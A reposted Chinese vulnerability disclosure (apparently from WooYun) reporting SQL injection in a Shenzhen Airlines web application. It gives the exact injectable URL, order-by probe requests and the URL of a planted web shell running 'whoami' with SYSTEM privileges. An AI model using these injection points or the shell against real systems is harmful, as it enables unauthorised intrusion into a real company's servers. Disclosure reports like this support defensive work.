神刀安全网

漏洞标题: 深圳航空SQL注入(authority权限)

漏洞详情

披露状态:

2016-04-03: 细节已通知厂商并且等待厂商处理中
2016-04-04: 厂商已经确认,细节仅向厂商公开
2016-04-14: 细节向核心白帽子及相关领域专家公开
2016-04-24: 细节向普通白帽子公开
2016-05-04: 细节向实习白帽子公开
2016-05-19: 细节向公众公开

简要描述:

深圳航空有限责任公司办理成立于1992年11月,1993年9月17日正式开航,是主要经营航空客、货、邮运输业务的股份制航空运输企业。自开航以来,保持了13年盈利和14年安全飞行。

详细说明:

http://v2.shenzhenair.com/

漏洞标题:  深圳航空SQL注入(authority权限)

注射点:http://v2.shenzhenair.com/Conf/jsp/systembulletin/bulletinAction.do?operator=state&sysId=1

测试:

code 区域
http://v2.shenzhenair.com/Conf/jsp/systembulletin/bulletinAction.do?operator=state&sysId=1%20order%20by%205

返回正常

code 区域
http://v2.shenzhenair.com/Conf/jsp/systembulletin/bulletinAction.do?operator=state&sysId=1%20order%20by%206

返回错误

直接写Shell:

http://v2.shenzhenair.com/wooyun.jsp?cmd=whoami

漏洞标题:  深圳航空SQL注入(authority权限)

为authority权限

漏洞证明:

如上

修复方案:

过滤

版权声明:转载请注明来源 路人甲@乌云

转载本站任何文章请注明:转载至神刀安全网,谢谢神刀安全网 » 漏洞标题: 深圳航空SQL注入(authority权限)

分享到:更多 ()

评论 抢沙发

  • 昵称 (必填)
  • 邮箱 (必填)
  • 网址